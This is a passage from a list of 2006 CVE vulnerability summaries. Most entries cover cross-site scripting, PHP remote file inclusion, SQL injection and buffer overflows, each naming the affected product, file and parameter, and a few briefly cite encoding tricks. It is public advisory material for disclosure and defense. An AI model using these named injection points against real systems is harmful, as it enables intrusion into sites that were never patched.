(2) SEmail parameters. [CVE-2006-4360] Cross-site scripting (XSS) vulnerability in E-commerce 4.7 for Drupal before file.module 1.37.2.4 (20060812) allows remote authenticated users with the "create products" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4358] Cross-site scripting (XSS) vulnerability in index.php in Diesel Pay allows remote attackers to inject arbitrary web script or HTML via the read parameter. [CVE-2006-4355] Cross-site scripting (XSS) vulnerability in Drupal Easylinks Module (easylinks.module) 4.7 before 1.5.2.1 2006/08/19 12:02:27 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4351] Cross-site scripting (XSS) vulnerability in index.php in OneOrZero 1.6.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2006-4327] Multiple cross-site scripting (XSS) vulnerabilities in add_url.php in CloudNine Interactive Links Manager 2006-06-12 allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) description, or (3) keywords parameters. [CVE-2006-4325] Cross-site scripting (XSS) vulnerability in gbook.php in Doika guestbook 2.5, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-4324] Cross-site scripting (XSS) vulnerability in add_url2.php in CityForFree indexcity 1.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2006-4317] Cross-site scripting (XSS) vulnerability in attachment.php in WoltLab Burning Board (WBB) 2.3.5 allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript. [CVE-2006-4305] Buffer overflow in SAP DB and MaxDB before 7.6.00.30 allows remote attackers to execute arbitrary code via a long database name when connecting via a WebDBM client. [CVE-2006-4302] The Java Plug-in J2SE 1.3.0_02 through 5.0 Update 5, and Java Web Start 1.0 through 1.2 and J2SE 1.4.2 through 5.0 Update 5, allows remote attackers to exploit vulnerabilities by specifying a JRE version that contain vulnerabilities. [CVE-2006-4299] Cross-site scripting (XSS) vulnerability in tiki-searchindex.php in TikiWiki 1.9.4 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter. NOTE: the provenance of this information is unknown [CVE-2006-4295] Cross-site scripting (XSS) vulnerability in ascan_6.asp in Panda ActiveScan 5.53.00 allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2006-4293] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 10 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter in dohtaccess.html, or the (2) file parameter in (a) editit.html or (b) showfile.html. [CVE-2006-4273] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin 3.5.4 and 3.6.0 allows remote attackers to inject arbitrary web script or HTML by uploading an attachment with a .pdf extension that contains JavaScript, which is processed as script by Microsoft Internet Explorer 6. [CVE-2006-4268] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file, (2) x, and (3) y parameters in (a) admin/filemanager/preview.php [CVE-2006-4259] Cross-site scripting (XSS) vulnerability in index.php in Fotopholder 1.8 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: this might be resultant from a directory traversal vulnerability. [CVE-2006-4256] index.php in Horde Application Framework before 3.1.2 allows remote attackers to include web pages from other sites, which could be useful for phishing attacks, via a URL in the url parameter, aka "cross-site referencing." NOTE: some sources have referred to this issue as XSS, but it is different than classic XSS. [CVE-2006-4255] Cross-site scripting (XSS) vulnerability in horde/imp/search.php in Horde IMP H3 before 4.1.3 allows remote attackers to include arbitrary web script or HTML via multiple unspecified vectors related to folder names, as injected into the vfolder_label form field in the IMP search screen. [CVE-2006-4238] SQL injection vulnerability in torrents.php in WebTorrent (WTcom) 0.2.4 and earlier allows remote attackers to execute arbitrary SQL commands via the cat parameter in category mode. [CVE-2006-4230] Multiple PHP remote file inclusion vulnerabilities in index.php in Lizge V.20 Web Portal allow remote attackers to execute arbitrary PHP code via a URL in the (1) lizge or (2) bade parameters. [CVE-2006-4228] Symantec Veritas NetBackup PureDisk Remote Office Edition 6.0 before MP1 20060816 allows remote attackers to bypass authentication and gain privileges via unknown attack vectors in the management interface. [CVE-2006-4224] Cross-site scripting (XSS) vulnerability in calendar.php in Virtual War (VWar) 1.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the year parameter. NOTE: The page parameter vector is covered by CVE-2006-4009. [CVE-2006-4223] IBM WebSphere Application Server (WAS) before 6.0.2.13 allows context-dependent attackers to obtain sensitive information via unspecified vectors related to "JSP source code exposure" (PK23475), which occurs when ibm-web-ext.xmi sets fileServingEnabled to true or ExtendedDocumentRoot is used to place a JSP outside a WAR.file [CVE-2006-4222] Multiple unspecified vulnerabilities in IBM WebSphere Application Server before 6.0.2.13 have unspecified vectors and impact, including (1) an "authority problem" in ThreadIdentitySupport as identified by PK25199, and "Potential security exposure" issues as identified by (2) PK22747, (3) PK24334, (4) PK25740, and (5) PK26123. [CVE-2006-4220] Multiple cross-site scripting (XSS) vulnerabilities in webacc in Novell GroupWise WebAccess before 7 Support Pack 3 Public Beta allow remote attackers to inject arbitrary web script or HTML via the (1) User.html, (2) Error, (3) User.Theme.index, and (4) and User.lang parameters. [CVE-2006-4217] PHP remote file inclusion vulnerability in modules/usersonline/users.php in WEBInsta CMS 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the module_dir parameter, a different vulnerability than CVE-2006-4196. NOTE: the provenance of this information is unknown [CVE-2006-4211] Cross-site scripting (XSS) vulnerability in b0zz and Chris Vincent Owl Intranet Engine 0.90 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4209] PHP remote file inclusion vulnerability in install3.php in WEBInsta Mailing List Manager 1.3e allows remote attackers to execute arbitrary PHP code via a URL in the cabsolute_path parameter. [CVE-2006-4206] Cross-site scripting (XSS) vulnerability in calendar.asp in ASPPlayground.NET Forum Advanced Edition 2.4.5 Unicode allows remote attackers to inject arbitrary web script or HTML via the calendarID parameter. [CVE-2006-4205] Multiple PHP remote file inclusion vulnerabilities in WebDynamite ProjectButler 0.8.4 allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to /classes/ scripts including (1) Cache.class.php, (2) Customer.class.php, (3) Performance.class.php, (4) Project.class.php, (5) Representative.class.php, (6) User.class.php, or (7) common.php. [CVE-2006-4200] Unspecified vulnerability in 04WebServer 1.83 and earlier allows remote attackers to bypass user authentication via unspecified vectors related to request processing. [CVE-2006-4199] Cross-site scripting (XSS) vulnerability in Soft3304 04WebServer 1.83 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly sanitized before it is returned in an error page, a different vulnerability than CVE-2004-1512. [CVE-2006-4196] PHP remote file inclusion vulnerability in index.php in WEBInsta CMS 0.3.1 and possibly earlier allows remote attackers to execute arbitrary PHP code via a URL in the templates_dir parameter. [CVE-2006-4166] PHP remote file inclusion vulnerability in TinyWebGallery 1.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the image parameter to (1) image.php or (2) image.php2. [CVE-2006-4165] Cross-site scripting (XSS) vulnerability in NetCommons 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4163] DISPUTED PHP remote file inclusion vulnerability in cls_fast_template.php in myWebland miniBloggie 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fname parameter. NOTE: another researcher was unable to find a way to execute code after including it via a URL. CVE analysis as of 20060816 was inconclusive. [CVE-2006-4162] Cross-site scripting (XSS) vulnerability in Dragonfly CMS 9.0.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search field. [CVE-2006-4157] Cross-site scripting (XSS) vulnerability in index.php in Yet another Bulletin Board (YaBB) allows remote attackers to inject arbitrary web script or HTML via the categories parameter. [CVE-2006-4137] IBM WebSphere Application Server before 6.1.0.1 allows attackers to obtain sensitive information via unspecified vectors related to (1) the log file, (2) "script generated syntax on wsadmin command line," and (3) traces. [CVE-2006-4136] Multiple unspecified vulnerabilities in IBM WebSphere Application Server before 6.1.0.1 have unspecified impact and attack vectors involving (1) "SOAP requests and responses", (2) mbean, (3) ThreadIdentitySupport, and possibly others. [CVE-2006-4129] PHP remote file inclusion vulnerability in admin.webring.docs.php in the Webring Component (com_webring) 1.0 and earlier for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the component_dir parameter. [CVE-2006-4120] Cross-site scripting (XSS) vulnerability in the Recipe module (recipe.module) before 1.54 for Drupal 4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4113] PHP remote file inclusion vulnerability in genpage-cgi.php in Brian Fraval hitweb 4.2 and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the REP_INC parameter. [CVE-2006-4109] Cross-site scripting (XSS) vulnerability in Bibliography (biblio.module) 4.6 before revision 1.1.1.1.4.11 and 4.7 before revision 1.13.2.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4106] Cross-site scripting (XSS) vulnerability in blursoft blur6ex 0.3 allows remote attackers to inject arbitrary web script or HTML via a comment title. [CVE-2006-4105] Cross-site scripting (XSS) vulnerability in Fill Threads Database (FTD) 3.7.3 allows remote attackers to inject arbitrary web script or HTML via the (1) search field or (2) an e-mail message. [CVE-2006-4104] Cross-site scripting (XSS) vulnerability in admin.cgi in mojoscripts.com mojoGallery allows remote attackers to inject arbitrary web script or HTML via "password input." [CVE-2006-4102] PHP remote file inclusion vulnerability in tpl.inc.php in Falko Timme and Till Brehm SQLiteWebAdmin 0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the conf[classpath] parameter. [CVE-2006-4092] Simpliciti Locked Browser does not properly limit a user's actions to ones within the intended Internet Explorer environment, which allows local users to perform unauthorized actions by visiting a web site that executes a JavaScript window.blur loop to remove focus from the browser window, then pressing CTRL-SHIFT-ESC to invoke the Task Manager. [CVE-2006-4091] Multiple cross-site scripting (XSS) vulnerabilities in Archangel Management Archangel Weblog 0.90.02 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Comment section. [CVE-2006-4090] Cross-site scripting (XSS) vulnerability in Webligo BlogHoster 2.2 allows remote attackers to inject arbitrary web script or HTML via the "From: part of the comment post," probably involving the nickname parameter to previewcomment.php. [CVE-2006-4089] Multiple buffer overflows in Andy Lo-A-Foe AlsaPlayer 0.99.76 and earlier allow remote attackers to cause a denial of service (application crash), or have other unknown impact, via (1) a long Location field sent by a web server, which triggers an overflow in the reconnect function in reader/http/http.c [CVE-2006-4088] Multiple cross-site scripting (XSS) vulnerabilities in CivicSpace 0.8.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Subject, (2) Comment, and (3) Add new comment sections. [CVE-2006-4087] Cross-site scripting (XSS) vulnerability in admin.cgi in mojoscripts.com mojoGallery allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: the provenance of this information is unknown [CVE-2006-4086] Cross-site scripting (XSS) vulnerability in index.php in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown [CVE-2006-4083] PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040. NOTE: the provenance of this information is unknown [CVE-2006-4079] Cross-site scripting (XSS) vulnerability in newpost.php in DeluxeBB 1.08, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the subject parameter (aka the topic title field). [CVE-2006-4077] PHP remote file inclusion vulnerability in CheckUpload.php in Vincenzo Valvano Comet WebFileManager (CWFM) 0.9.1, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the Language parameter. [CVE-2006-4069] Multiple cross-site scripting (XSS) vulnerabilities in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) m and (2) c parameters in index.php, (3) a search action, and (4) a "submit comment" action. [CVE-2006-4067] Cross-site scripting (XSS) vulnerability in cake/libs/error.php in CakePHP before 1.1.7.3363 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in a 404 ("Not Found") error page. NOTE: some of these details are obtained from third party information. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-4058] Cross-site scripting (XSS) vulnerability in archive.php in Simplog 0.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyw parameter when performing a search. NOTE: some details are obtained from third party information. [CVE-2006-4052] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Simple Shop 2.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) admin/index.php, (2) admin/adminindex.php, (3) admin/adminglobal.php, (4) admin/login.php, (5) admin/menu.php or (6) admin/header.php. [CVE-2006-4051] PHP remote file inclusion vulnerability in global.php in Turnkey Web Tools PHP Live Helper 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter. [CVE-2006-4043] index.php in myWebland myBloggie 2.1.4 and earlier allows remote attackers to obtain sensitive information via a query that only specifies the viewdate mode, which reveals the table prefix in a SQL error message. [CVE-2006-4042] Multiple SQL injection vulnerabilities in trackback.php in myWebland myBloggie 2.1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) title, (2) url, (3) excerpt, or (4) blog_name parameters. [CVE-2006-4040] PHP remote file inclusion vulnerability in myevent.php in myWebland myEvent 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter. [CVE-2006-4038] Multiple cross-site scripting (XSS) vulnerabilities in eintragen.php in GaesteChaos 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gastname or (2) gastwohnort parameters. [CVE-2006-4017] Cross-site scripting (XSS) vulnerability in the search module in Inter Network Marketing (INM) CMS G3 allows remote attackers to inject arbitrary web script or HTML via the search_string parameter. [CVE-2006-4016] Cross-site scripting (XSS) vulnerability in /toendaCMS in toendaCMS stable 1.0.3 and earlier, and unstable 1.1 and earlier, allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2006-4012] Multiple PHP remote file inclusion vulnerabilities in circeOS SaveWeb Portal 3.4 allow remote attackers to execute arbitrary PHP code via a URL in the SITE_Path parameter to (1) poll/poll.php or (2) poll/view_polls.php. NOTE: the menu_dx.php vector is already covered by CVE-2005-2687. [CVE-2006-4009] Cross-site scripting (XSS) vulnerability in war.php in Virtual War (Vwar) 1.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-4002] Cross-site scripting (XSS) vulnerability in user.module in Drupal 4.6 before 4.6.9, and 4.7 before 4.7.3, allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: portions of these details are obtained from third party information. [CVE-2006-3977] Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 has unknown impact and remote attackers related to "improper processing of outdated WebScan components." [CVE-2006-3976] Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 allows remote attackers to install arbitrary files. [CVE-2006-3975] Unspecified vulnerability in CA eTrust Antivirus WebScan allows remote attackers to execute arbitrary code due to "improper bounds checking when processing certain user input." [CVE-2006-3974] Cross-site scripting (XSS) vulnerability in cgi-bin/admin in 3Com OfficeConnect Secure Router with firmware 1.04-168 allows remote attackers to inject arbitrary web script or HTML via the tk parameter. [CVE-2006-3971] Cross-site scripting (XSS) vulnerability in visitor/livesupport/chat.php in Scott Weedon Ajax Chat, possibly 0.1, allows remote attackers to inject arbitrary web script or HTML via the userid parameter. [CVE-2006-3965] Banex PHP MySQL Banner Exchange 2.21 stores lib.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as database usernames and passwords. [CVE-2006-3958] Multiple unspecified cross-site scripting (XSS) vulnerabilities in Taskjitsu 2.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) the Search Tasks system, or authenticated users via (2) the Edit Task system, (3) the back-end Category Editor system, and (4) "Pages that display task status, email addresses, URL, customer, and project information." [CVE-2006-3956] Multiple cross-site scripting (XSS) vulnerabilities in contact.php in Advanced Webhost Billing System (AWBS) 2.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) AccountUsername and (3) Message parameters. [CVE-2006-3953] Cross-site scripting (XSS) vulnerability in usercp.php in MyBB (aka MyBulletinBoard) 1.x allows remote attackers to inject arbitrary web script or HTML via the gallery parameter. [CVE-2006-3948] Cross-site scripting (XSS) vulnerability in modules.php in PHP-Nuke INP allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2006-3946] WebCore in Apple Mac OS X 10.3.9 and 10.4 through 10.4.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted HTML that triggers a "memory management error" in WebKit, possibly due to a buffer overflow, as originally reported for the KHTMLParser::popOneBlock function in Apple Safari 2.0.4 using Javascript that changes document.body.innerHTML within a DIV tag. [CVE-2006-3935] system/workplace/views/admin/admin-main.jsp in Alkacon OpenCms before 6.2.2 does not restrict access to administrator functions, which allows remote authenticated users to (1) send broadcast messages to all users (/workplace/broadcast), (2) list all users (/accounts/users), (3) add webusers (/accounts/webusers/new), (4) upload database import and export files (/database/importhttp), (5) upload arbitrary program modules (/modules/modules_import), and (6) read the log file (/workplace/logfileview) by setting the appropriate value for the path parameter in a direct request to admin-main.jsp. [CVE-2006-3933] Cross-site scripting (XSS) vulnerability in Alkacon OpenCms before 6.2.2 allows remote authenticated users to inject arbitrary web script or HTML via the message body. [CVE-2006-3929] Cross-site scripting (XSS) vulnerability in the Forms/rpSysAdmin script on the Zyxel Prestige 660H-61 ADSL Router running firmware 3.40(PT.0)b32 allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the a parameter. [CVE-2006-3927] Cross-site scripting (XSS) vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter. [CVE-2006-3924] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos before 1.6.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-3923] Cross-site scripting (XSS) vulnerability in add.php in Fire-Mouse Toplist 1.1 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the Seitenname parameter. [CVE-2006-3921] Sun Java System Application Server (SJSAS) 7 through 8.1 and Web Server (SJSWS) 6.0 and 6.1 allows remote authenticated users to read files outside of the "document root directory" via a direct request using a UTF-8 encoded URI. [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file. [CVE-2006-3916] Cross-site scripting (XSS) vulnerability in snews.php in sNews (aka Solucija News) 1.4 allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. [CVE-2006-3914] Cross-site scripting (XSS) vulnerability in Blackboard Academic Suite 6.2.3.23 allows remote authenticated users to inject arbitrary HTML or web script by bypassing client-side validation through disabling JavaScript when submitting an essay response, which has no server-side validation before being viewed via "View Attempt Details" in the Gradebook. [CVE-2006-3909] Cross-site scripting (XSS) vulnerability in calendar.php in WWWthreads allows remote attackers to inject arbitrary web script or HTML via the week parameter. [CVE-2006-3905] SQL injection vulnerability in Webland MyBloggie 2.1.3 allows remote attackers to execute arbitrary SQL commands via the (1) post_id parameter in index.php and (2) search function. [CVE-2006-3903] CRLF injection vulnerability in (1) index.php and (2) admin.php in myWebland MyBloggie 2.1.3 allows remote attackers to hijack sessions and conduct cross-site scripting (XSS) attacks via a cookie. [CVE-2006-3902] Cross-site scripting (XSS) vulnerability in index.php in phpFaber TopSites 2.0.9 allows remote attackers to inject arbitrary web script or HTML via the i_cat parameter. NOTE: the provenance of this information is unknown [CVE-2006-3900] Cross-site scripting (XSS) vulnerability in guestbook.php in TP-Book 1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2006-3883] Multiple cross-site scripting (XSS) vulnerabilities in Gonafish LinksCaffe 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the tablewidth parameter in (a) counter.php [CVE-2006-3881] Cross-site scripting (XSS) vulnerability in Shalwan MusicBox 2.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter in a request for the top-level URI. NOTE: the id parameter in index.php, and the type and show parameters in a top action, are already covered by CVE-2006-1349 [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3848] Cross-site scripting (XSS) vulnerability in CGI wrapper for IP Calculator (IPCalc) 0.40 allows remote attackers to inject arbitrary web script or HTML via the URI (REQUEST_URI environment variable), which is used in the actionurl variable. [CVE-2006-3842] Cross-site scripting (XSS) vulnerability in Zoho Virtual Office 3.2 Build 3210 allows remote attackers to execute arbitrary web script or HTML via an HTML message. [CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL. [CVE-2006-3831] The Backup selection in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier uses predicable filenames for database backups and stores the files under the web root with insufficient access control, which allows remote attackers to obtain sensitive information by downloading a backup file. [CVE-2006-3830] The Languages selection in the admin interface in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier allows remote authenticated administrators to upload files with arbitrary extensions to the bmc/Inc/Lang directory. NOTE: because the uploaded files cannot be accessed through HTTP, this issue is a vulnerability only if there is a likely usage pattern in which the files would be opened or executed by local users, e.g., malware files with names that entice local users to open the files. [CVE-2006-3826] Multiple cross-site scripting (XSS) vulnerabilities in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user_login, (2) full_name, and (3) URL parameters in register.php [CVE-2006-3821] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) lang parameter in (a) index_list.php and (2) year, (3) month, and (4) day parameter in (b) registration.php. [CVE-2006-3820] Cross-site scripting (XSS) vulnerability in loudblog/index.php in Loudblog before 0.5 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-3818] Cross-site scripting (XSS) vulnerability in the login page in Novell GroupWise WebAccess 6.5 before 20060721 and WebAccess 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via the GWAP.version parameter. [CVE-2006-3817] Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence. [CVE-2006-3810] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 1.5 before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the XPCNativeWrapper(window).Function construct. [CVE-2006-3800] Cross-site scripting (XSS) vulnerability in Amazing Flash AFCommerce Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the "new review" text box. [CVE-2006-3795] Multiple cross-site scripting (XSS) vulnerabilities in DeluxeBB before 1.08 allow remote attackers to inject arbitrary web script or HTML via the (1) membercookie cookie in header.php and the (2) redirect parameter in misc.php. [CVE-2006-3780] Keyifweb Keyif Portal 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) ANKET/anket.mdb, (2) HABER/keyifweb.mdb, (3) ASP/download.mdb, or (4) SAYAC/aktif.mdb in the database/A9S7G6ASD790 directory. [CVE-2006-3769] Multiple cross-site scripting (XSS) vulnerabilities in Top XL 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pass and (2) pass2 parameters in (a) add.php or the (3) id parameter in (b) members/index.php. [CVE-2006-3767] Cross-site scripting (XSS) vulnerability in showprofile.php in Darren's $5 Script Archive osDate 1.1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the onerror attribute in an HTML IMG tag with a non-existent source file in txtcomment parameter, which is used when posting a comment. [CVE-2006-3765] Multiple cross-site scripting (XSS) vulnerabilities in Huttenlocher Webdesign hwdeGUEST 2.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, as demonstrated by the "name input" field in new_entry.php. [CVE-2006-3761] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.0 RC2 through 1.1.4 allows remote attackers to inject arbitrary web script or HTML via a javascript URI with an SGML numeric character reference in the url BBCode tag, as demonstrated using "java&#115 [CVE-2006-3756] Cross-site scripting (XSS) vulnerability in Geeklog 1.4.0sr4 and earlier, and 1.3.11sr6 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when validating comments in (1) lib-comment.php (1.4.0sr4) or (2) comment.php (0.3.11sr6). [CVE-2006-3737] Cross-site scripting (XSS) vulnerability in filemanager/filemanager.php in the control panel in SWsoft Plesk 8.0 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the file parameter. [CVE-2006-3734] Multiple unspecified vulnerabilities in the Command Line Interface (CLI) for Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allow local CS-MARS administrators to execute arbitrary commands as root. [CVE-2006-3733] jmx-console/HtmlAdaptor in the jmx-console in the JBoss web application server, as shipped with Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allows remote attackers to gain privileges as the CS-MARS administrator and execute arbitrary Java code via an invokeOp action in the BSHDeployer jboss.scripts service name. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3700] Multiple unspecified vulnerabilities in Oracle Database 9.2.0.6 and 10.1.0.4 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB04 for Web Distributed Authoring and Versioning (DAV) and (2) DB23 for XMLDB. [CVE-2006-3681] Multiple cross-site scripting (XSS) vulnerabilities in awstats.pl in AWStats 6.5 build 1.857 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) refererpagesfilter, (2) refererpagesfilterex, (3) urlfilterex, (4) urlfilter, (5) hostfilter, or (6) hostfilterex parameters, a different set of vectors than CVE-2006-1945. [CVE-2006-3680] Cross-site scripting (XSS) vulnerability in photocycle in Photocycle 1.0 allows remote attackers to inject arbitrary web script or HTML via the phpage parameter. [CVE-2006-3661] Cross-site scripting (XSS) vulnerability in Index.PHP in CuteNews 1.4.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2006-3640] Microsoft Internet Explorer 5.01 and 6 allows certain script to persist across navigations between pages, which allows remote attackers to obtain the window location of visited web pages in other domains or zones, aka "Window Location Information Disclosure Vulnerability." [CVE-2006-3639] Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." [CVE-2006-3636] Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.9rc1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-3624] Multiple cross-site scripting (XSS) vulnerabilities in FLV Players 8 allow remote attackers to inject arbitrary web script or HTML via the url parameter to (1) player.php or (2) popup.php. [CVE-2006-3620] Cross-site scripting (XSS) vulnerability in the showtopic module in Koobi Pro CMS 5.6 allows remote attackers to inject arbitrary web script or HTML via the toid parameter. [CVE-2006-3618] SQL injection vulnerability in pblguestbook.php in Pixelated By Lev (PBL) Guestbook 1.32 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) website, (4) comments, (5) rate, and (6) private parameters. [CVE-2006-3617] Cross-site scripting (XSS) vulnerability in pblguestbook.php in Pixelated By Lev (PBL) Guestbook 1.32 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) message (aka comments), (3) website, and (4) email parameters, which bypasses XSS protection mechanisms that check for SCRIPT tags but not others, as demonstrated by a javascript URI in an onMouseOver attribute and the src attribute in an iframe tag. NOTE: some vectors might overlap CVE-2006-2975, although the use of alternate manipulations makes it unclear. [CVE-2006-3616] Multiple cross-site scripting (XSS) vulnerabilities in Carbonize Lazarus Guestbook 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in codes-english.php and (2) the img parameter in picture.php, after the name of an existing file. [CVE-2006-3613] Multiple cross-site scripting (XSS) vulnerabilities in Chamberland Technology ezWaiter 3.0 Online and possibly Enterprise Software (aka enterprise edition) allow remote attackers to inject arbitrary web script or HTML via the (1) itemfor (aka "Who is this item for?") and (2) special (aka "Special Instructions") parameters to item.php, which is accessed from showorder.php, or (3) unspecified parameters to the login form at login.php. 